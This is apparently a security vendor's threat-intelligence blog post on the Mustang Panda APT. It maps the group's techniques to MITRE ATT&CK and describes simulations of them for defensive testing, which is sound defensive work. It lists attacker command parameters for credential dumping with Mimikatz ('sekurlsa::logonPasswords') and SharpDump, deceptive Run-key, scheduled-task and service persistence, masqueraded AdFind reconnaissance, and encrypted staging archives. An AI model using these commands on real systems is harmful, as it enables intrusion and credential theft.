Breaking Down Mustang Panda’s Windows Endpoint Campaign

Mustang Panda Threat Group Overview

Mustang Panda is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. The group has targeted government entities, nonprofits, religious organizations, and other NGOs across the U.S., Europe, Mongolia, Myanmar, Pakistan, Vietnam, and other regions. 

Mustang Panda is considered a state-sponsored APT with a focus on long-term intelligence gathering. The group is best known for highly tailored spear-phishing campaigns that leverage geopolitical or local-language lures to deliver multi-stage malware payloads.

Over the years, it has deployed tools such as PlugX, Poison Ivy, Toneshell, Pubload, and newer malware families, including FDMTP and PTSOCKET, designed to evade endpoint defensive mechanisms. 

A high-profile case in early 2025 saw the U.S. Department of Justice and French authorities neutralize PlugX infections placed by Mustang Panda on over 4,200 devices via malicious USB drives, underscoring the group’s global reach and evolving tradecraft.

Tactics, Techniques, and Procedures (TTPs) of the Mustang Panda APT

Execution (ATT&CK TA0007)

MITRE T1566.001 - Spearphishing Attachment

• Executing a Binary via a Masqueraded LNK File

Mustang Panda is known to deliver spearphishing attachments that masquerade as legitimate documents. 

In particular, they often abuse Windows LNK (shortcut) files by disguising them as benign Word documents or PDFs. Once a user opens the attachment, the LNK file executes commands that launch malicious binaries while maintaining the appearance of a trusted file.

This method allows attackers to bypass user suspicion and initiate the infection chain without requiring macros or scripts. The tactic has been observed in multiple Mustang Panda campaigns targeting government and NGO entities.

How Does Picus Simulate This Behavior?

Picus simulates this execution flow to validate whether security controls can detect and prevent it. The simulation replicates the adversary’s behavior by triggering the following process chain:

MITRE T1218.007 - Msiexec

• Executing Msiexec.exe Command to Drop Files

Mustang Panda has also been observed leveraging Msiexec.exe, a legitimate Windows Installer utility, to deliver and execute malicious payloads. By abusing this signed binary, attackers gain two key advantages:

• Living-off-the-land execution: Msiexec.exe is a trusted system utility, making its activity less suspicious to defenders.
• Stealthy payload delivery: Attackers can install malicious MSI packages or drop arbitrary files without triggering typical file execution alerts.

In Mustang Panda campaigns, Msiexec abuse is often tied to lateral movement and persistence, where adversaries execute crafted commands to drop and run malicious DLLs or executables under the guise of legitimate software installation.

How Does Picus Simulate This Behavior?

Picus simulates this execution flow to validate whether defenses detect and respond when Msiexec.exe is abused:

• /q: Runs the installer in quiet mode, suppressing user prompts or visible windows.
• /i "%TMP%\in.sys": Attempts to install the specified file (here simulated as in.sys), imitating the attacker’s use of Msiexec to drop and execute malicious payloads from a temporary directory.

This simulation reproduces the attacker technique in a safe, controlled manner to check if EDR, AV, and detection rules trigger on Msiexec misuse.

MITRE T1574.002 - DLL Side-Loading

• Loading a DLL File in "MpDlpCmd.exe" using DLL Side-Loading Technique

Mustang Panda is also known to abuse the DLL side-loading technique to execute malicious payloads under the cover of legitimate applications. In this technique, adversaries place a malicious DLL in a directory where a trusted application will automatically load it instead of the legitimate library. Because the DLL is executed by a signed and trusted binary, the malicious activity appears to originate from a legitimate process, significantly reducing the chance of detection.

In multiple Mustang Panda campaigns, attackers have side-loaded DLLs into security and system binaries (such as Microsoft Defender components), taking advantage of predictable DLL search order. This enables both stealthy execution and persistence while blending in with normal system operations.

How Does Picus Simulate This Behavior?

Picus recreates this attacker technique to validate whether defenses can detect DLL side-loading abuse:

Persistence (ATT&CK TA0003)

MITRE T1547.001 - Registry Run Keys / Startup Folder

Mustang Panda frequently abuses Windows Registry Run keys to establish persistence across system reboots. By creating new entries under the HKLM\Software\Microsoft\Windows\CurrentVersion\Run hive, attackers ensure their payloads automatically execute whenever the system starts.

This method is stealthy because it leverages a native Windows mechanism used by legitimate applications. In observed Mustang Panda campaigns, malicious executables or loaders are registered under deceptive names (e.g., mimicking Microsoft Defender services) to blend into normal startup behavior. Once in place, these keys guarantee reliable execution of attacker-controlled processes without requiring user interaction.

• Creating a New Registry Key "WindowsDefenderUpdater" in HKLM Hive

How Does Picus Simulate This Behavior?

Picus simulates the creation of such registry keys to validate whether defenses detect and prevent persistence via registry modification.

• /t REG_EXPAND_SZ: Specifies the type of registry value.
• /v WindowsDefenderUpdater: Creates a new value under the Run key, masquerading as a Microsoft Defender component.
• /d "cmstp.exe /s c:\programdata\DefenderService.inf": Configures the entry to execute cmstp.exe with a crafted INF file at startup, mimicking how adversaries register payloads for persistence.
• /f: Forces overwriting if the key already exists.

This ensures defenders can detect adversaries like Mustang Panda using HKLM Run key abuse to maintain long-term access.

MITRE T1053.005 - Scheduled Task

• Creating a Scheduled Task "InetlSecurityAssistManager" using Schtasks

Mustang Panda has been observed abusing Windows Task Scheduler to achieve persistence and repeated execution of malicious code. By creating scheduled tasks that mimic legitimate system processes or services, adversaries ensure their payloads run at defined intervals or on system startup.

This technique blends into normal administrative activity, since schtasks.exe is a trusted Windows utility. Attackers often name tasks deceptively (e.g., “InetlSecurityAssistManager” resembling “Intel Security”) to avoid suspicion during manual inspection. Once created, the scheduled task launches the attacker’s payload on schedule, providing reliable and stealthy persistence.

How Does Picus Simulate This Behavior?

Picus simulates this technique by creating a scheduled task with parameters that mirror adversary tradecraft.

• /sc MINUTE: Defines the schedule (runs every minute).
• /tn "InetlSecurityAssistManager": Creates a task with a deceptive name, designed to look like a legitimate Intel process.
• /tr "wscript %TMP%\test.vbs": Sets the task to execute a VBScript payload located in the temporary directory, simulating attacker use of script-based malware loaders.
• /mo 10: Specifies the frequency (every 10 minutes).
• /F: Forces task creation, overwriting any existing task with the same name.

This simulation enables defenders to test whether their EDR, SIEM, and Windows event monitoring solutions can detect malicious task creation.

MITRE T1543.003 - Windows Service

• Create New Service for Persistence

Mustang Panda, like many advanced threat actors, has been observed leveraging Windows services to maintain persistence on compromised systems. By creating a new service that points to a malicious executable or script, adversaries ensure their payload runs with system-level privileges and is automatically executed at startup.

This approach is stealthy and resilient because services are a native mechanism used by Windows and are often trusted by administrators. Attackers typically disguise service names with legitimate-looking identifiers (e.g., security-related terms) to avoid raising suspicion during routine inspections. Once installed, the malicious service guarantees reliable execution, even across reboots.

How Does Picus Simulate This Behavior?

Picus simulates this persistence technique by creating a Windows service configured to execute a malicious command.

• sc.exe create REG_WINDEF: Creates a new service named REG_WINDEF, masquerading as a Windows Defender-related component.
• binPath="cmd.exe /c powershell.exe …": Configures the service to execute PowerShell via cmd.exe, bypassing execution policy and hiding the window while running a script.
• -file \Windows\Temp\REG_WINDEF.ps1: Points to a script placed in the Temp directory, simulating an attacker’s payload.
• start=Auto: Ensures the service starts automatically on system boot, providing persistence.

Defense Evasion (ATT&CK TA0005)

MITRE T1134.002 - Create Process with Token

• Inject Remote Shellcode into Werfault.exe

Mustang Panda has leveraged token manipulation and process injection techniques to escalate privileges and execute malicious code under the context of trusted Windows processes. In this case, the adversary targets Werfault.exe, the Windows Error Reporting process, which runs with elevated trust.

By injecting malicious shellcode into Werfault.exe, attackers achieve several goals:

• Privilege escalation – executing payloads with higher permissions.
• Defense evasion – hiding execution within a legitimate process.
• Persistence for C2 – allowing malware to blend in and maintain communication.

This technique is powerful because many security tools trust Werfault.exe as a signed Microsoft binary, making injected code harder to detect. Mustang Panda has used similar tradecraft to conceal implants and backdoors within legitimate processes during espionage campaigns.

How Does Picus Simulate This Behavior?

This controlled simulation validates whether defenses detect token abuse, process injection attempts, and suspicious child process creation chains. 

Credential Access (ATT&CK TA0006)

MITRE T1003.001 - LSASS Memory

• Dump Lsass Process Memory via SharpDump

Mustang Panda, like many advanced threat groups, has been reported using credential dumping techniques to extract usernames and passwords directly from memory. A prime target is the Local Security Authority Subsystem Service (LSASS) process, which stores credential material such as NTLM hashes, Kerberos tickets, and plaintext passwords in certain cases.

By dumping LSASS memory, adversaries can harvest credentials to facilitate lateral movement, privilege escalation, and long-term persistence within enterprise networks. Tools like Mimikatz, ProcDump, and custom variants (such as SharpDump) are commonly used for this purpose. Because LSASS runs with high privileges, compromising it gives attackers access to a wealth of sensitive authentication data.

Mustang Panda has incorporated credential dumping in espionage-focused campaigns to expand access across government and NGO networks, enabling them to maintain stealthy footholds and escalate privileges.

How Does Picus Simulate This Behavior?

Picus simulates this threat by safely executing a credential dumping attempt using a benign SharpDump invocation.

Executes SharpDump, a tool designed to dump the memory of the LSASS process.

In real-world scenarios, this would attempt to read and extract sensitive data, but within the Picus simulation, no actual credential data is accessed or exposed. The purpose is to validate whether security solutions can detect the attempt to access LSASS memory.

• Gather credentials using Mimikatz (2.2.0 20220919) Tool

Mimikatz is one of the most widely used tools by both nation-state groups and cybercriminals for credential theft. Threat actors such as Mustang Panda have been observed leveraging Mimikatz to dump credentials from memory and extract authentication artifacts.

Mimikatz provides direct access to sensitive material by:

• Dumping logon session credentials (usernames, plaintext passwords, NTLM hashes, and Kerberos tickets) from LSASS.
• Leveraging debug privileges to access protected memory areas.
• Facilitating lateral movement and privilege escalation by reusing stolen credentials across the network.

Mustang Panda and similar APT groups often integrate Mimikatz into broader attack chains to pivot quickly inside compromised environments while remaining stealthy, bypassing traditional authentication barriers.

How Does Picus Simulate This Behavior?

Picus safely simulates Mimikatz execution to validate the detection of credential dumping activities without exposing real credentials.

• mimikatz22020220919x64.exe: Simulates execution of the specified Mimikatz version.
• "privilege::debug": Requests debug-level privileges to access LSASS memory.
• "sekurlsa::logonPasswords": Attempts to extract logon passwords, hashes, and Kerberos tickets from LSASS.
• exit: Ends the Mimikatz session.

By testing this behavior, Picus helps ensure defenders can reliably detect adversaries like Mustang Panda when they weaponize Mimikatz to compromise authentication data and move laterally across networks.

Discovery (ATT&CK TA0007)

T1016 - System Network Configuration Discovery

• Gather System Information by using Command-line Tools

Mustang Panda, like many APT groups, routinely performs system and network discovery after initial access. These reconnaissance steps help adversaries map the environment, identify valuable targets, and plan lateral movement. By leveraging native Windows command-line tools, attackers gather details without introducing external binaries, which makes the activity harder to detect.

Typical discovery goals include:

• Identifying network interfaces and configurations (IP addresses, DNS, DHCP).
• Enumerating ARP tables to map local hosts.
• Examining routing tables for network paths.
• Collecting system-level details such as OS version, hotfixes, and hardware info.

Mustang Panda integrates these simple yet powerful discovery techniques into its campaigns to expand situational awareness before executing further exploitation.

How Does Picus Simulate This Behavior?

T1518.001 - Security Software Discovery

• Gathering Antivirus Programs using WMIC

Threat actors such as Mustang Panda often perform security software discovery to understand what defenses are present on a compromised host. By enumerating antivirus and endpoint protection solutions, adversaries can adapt their techniques to evade detection, disable defenses, or select payloads most likely to succeed.

One common method is abusing Windows Management Instrumentation (WMI), a powerful administrative interface. Attackers query the root\SecurityCenter2 namespace, which maintains details about installed security products. This provides adversaries with:

• Names and states of antivirus and endpoint solutions.
• Vendor information is useful for tailoring evasion techniques.
• Insights into whether defenses are active or outdated.

Mustang Panda and other APT groups have relied on WMI reconnaissance as part of their pre-exploitation phase, ensuring their malware can operate with minimal interference.

How Does Picus Simulate This Behavior?

Picus replicates this discovery technique by executing a PowerShell command that queries WMI for antivirus product information.

• Get-WmiObject: Uses WMI to retrieve system information.
• -Namespace 'root\SecurityCenter2': Targets the specific namespace where Windows stores security product data.
• -Class AntiVirusProduct: Queries details about installed antivirus solutions.
• -ErrorAction Stop: Ensures the command fails cleanly if access is blocked, simulating adversary error handling.

This simulation safely reproduces attacker behavior without exposing real product configurations.

• Gathering Disk Information from the Target via WMIC.exe

Adversaries such as Mustang Panda frequently conduct system reconnaissance to learn about available storage devices on compromised machines. By enumerating disk information, attackers can identify:

• Mounted drives and volumes (including external or networked disks).
• Available free space for staging tools or exfiltrated data.
• Total capacity to plan large-scale data theft or payload deployment.

Using WMIC.exe (Windows Management Instrumentation Command-line), attackers query the logicaldisk class to extract disk details. This method blends into normal administrative activity and avoids introducing third-party tools, making it a stealthy reconnaissance tactic. Mustang Panda and other APT actors have leveraged WMI queries as part of their environment mapping phase before moving on to data theft or persistence operations.

How Does Picus Simulate This Behavior?

Picus simulates this discovery activity by executing a WMIC command that retrieves disk details.

• wmic.exe: Calls the WMI command-line utility.
• logicaldisk: Specifies the WMI class responsible for disk and volume data.
• get size,freespace,caption: Queries each logical disk for total size, remaining free space, and drive letter.

This safe simulation mimics adversary tradecraft without accessing sensitive files or altering system state. It validates whether EDRs, SIEM rules, and host monitoring can detect suspicious use of WMIC for reconnaissance.

T1018 - Remote System Discovery

• Gather Information about Target Domain using Adfind

Advanced threat actors such as Mustang Panda often perform Active Directory reconnaissance to understand domain structures, remote systems, and user objects. One widely abused utility is Adfind, a legitimate command-line tool designed for querying Active Directory.

By abusing Adfind, adversaries can:

• Enumerate domain computers, users, and groups.
• Gather organizational unit (OU) structure and trust relationships.
• Export directory data to files for offline analysis.

This reconnaissance enables attackers to map enterprise networks, identify high-value accounts, and prepare for lateral movement and privilege escalation. Mustang Panda has been observed leveraging such domain enumeration tools to support espionage operations against government and private sector targets.

How Does Picus Simulate This Behavior?

Picus simulates this technique by executing a controlled command that mimics how Adfind is weaponized.

• %TMP%\sqlceip.exe: Represents the execution of Adfind (masqueraded here as sqlceip.exe) from the temporary directory.
• -f objectcategory=*: Requests enumeration of all Active Directory objects (users, computers, groups, etc.).
• > "%TMP%\sqlceip.txt": Redirects the results into a file for later use, simulating how attackers stage reconnaissance data for exfiltration.

T1654 - Log Enumeration

• Discovering Users from Windows Security Event Logs via Wevtutil

Adversaries such as Mustang Panda frequently query Windows Event Logs to extract operational intelligence from compromised systems. By enumerating authentication and security-related events, attackers can identify:

• Logged-in users and accounts (via successful logon events).
• Domain controllers and authentication sources.
• Patterns of user activity that inform lateral movement planning.

The Windows native utility Wevtutil.exe allows adversaries to query event logs directly. In particular, Event ID 4624 (successful logon) provides valuable details on user accounts, logon types, and session origins. This tactic gives attackers insight into which accounts are active and potentially valuable for privilege escalation or credential theft.

How Does Picus Simulate This Behavior?

Picus safely simulates this discovery step by issuing a Wevtutil query.

• wevtutil.exe qe Security: Queries the Windows Security event log.
• /format:text: Outputs the results in plain text for easy parsing.
• /q:"Event[System[(EventID=4624)]]": Filters specifically for Event ID 4624, which corresponds to successful logon events.

Collection (ATT&CK TA0009)

T1113 - Screen Capture

• Capturing Screenshot via .NET Binary

Threat groups such as Mustang Panda often employ screen capture techniques to collect sensitive on-screen data from compromised systems. Screenshots can reveal:

• Open applications and documents (e.g., email, chat, or spreadsheets).
• Session information such as logged-in accounts or admin consoles.
• Operational details that can’t be accessed through file theft alone.

Attackers commonly use custom binaries written in .NET to take screenshots and save them locally before exfiltration. This allows them to silently monitor user activity and gather intelligence without directly interacting with files. Screen capture is especially valuable for espionage-focused campaigns, where context is as important as credentials or system data.

Mustang Panda has incorporated such tactics into their malware families to extend surveillance capabilities within targeted organizations.

How Does Picus Simulate This Behavior?

 T1056.001 - Keylogging

• Executing a Keylogger uses GetAsyncKeyState()

Adversaries such as Mustang Panda often deploy keyloggers to silently capture keystrokes from compromised systems. This allows them to harvest:

• Usernames and passwords entered into applications or web logins.
• Confidential communications typed in chat, email, or documents.
• System commands that reveal administrator activity.

A common method is abusing the Windows API function GetAsyncKeyState(), which checks the state of keys on a keyboard at any given time. By repeatedly polling this function, a keylogger can record every keystroke without requiring elevated privileges or triggering user-visible alerts.

Keyloggers are a hallmark of espionage operations, giving attackers like Mustang Panda persistent access to sensitive data without needing direct credential dumps or memory scraping.

How Does Picus Simulate This Behavior?

Picus simulates this behavior by executing a benign binary that mimics a keylogger’s use of GetAsyncKeyState().

• cmd.exe /c: Runs the specified program via the command line.
• C:\Users\Public\getasynckeystate.exe: Represents a simulated keylogger binary that calls GetAsyncKeyState() to capture keystrokes.

This controlled simulation does not capture real keystrokes but reproduces the execution footprint of a keylogger. 

T1560.001 - Archive via Utility

• Creating an Encrypted Archive File via Winrar

Adversaries such as Mustang Panda often prepare data for exfiltration by compressing and encrypting files into archives. This tactic:

• Reduces file size to make large data sets easier to move.
• Bundles multiple files into one container for streamlined transfer.
• Applies encryption to evade content inspection and DLP (Data Loss Prevention) controls.

Utilities like WinRAR (rar.exe) are frequently abused for this purpose because they are widely available and trusted in enterprise environments. By creating password-protected archives, attackers ensure that sensitive data remains hidden even if intercepted during transfer. Mustang Panda has been observed using encrypted RAR files to stage stolen documents before exfiltration.

How Does Picus Simulate This Behavior?

Picus simulates this activity by safely executing a WinRAR command that creates an encrypted archive.

These two processes compress Word documents into a password-protected RAR archive named P1CUS4.ldf in the temporary directory. 

The command applies maximum compression, includes subdirectories, and enforces AES-256 encryption with the specified password. To complete the scenario, Picus also triggers a file search for %TMP%\P1CUS4.ldf, mimicking the staging step adversaries take once an archive has been created.

How Picus Helps Defend Against Mustang Panda Threat Group Attacks?

The Picus Security Validation Platform safely simulates Mustang Panda Threat Group’s techniques using its continuously updated Threat Library, identifying blind spots across EDRs, NGFWs, and SIEMs before attackers can exploit them. 

You can also test your defenses against hundreds of other Linux malware variants, such as UNC3886, APT31, Melofee malware campaigns within minutes with a 14-day free trial of the Picus Platform.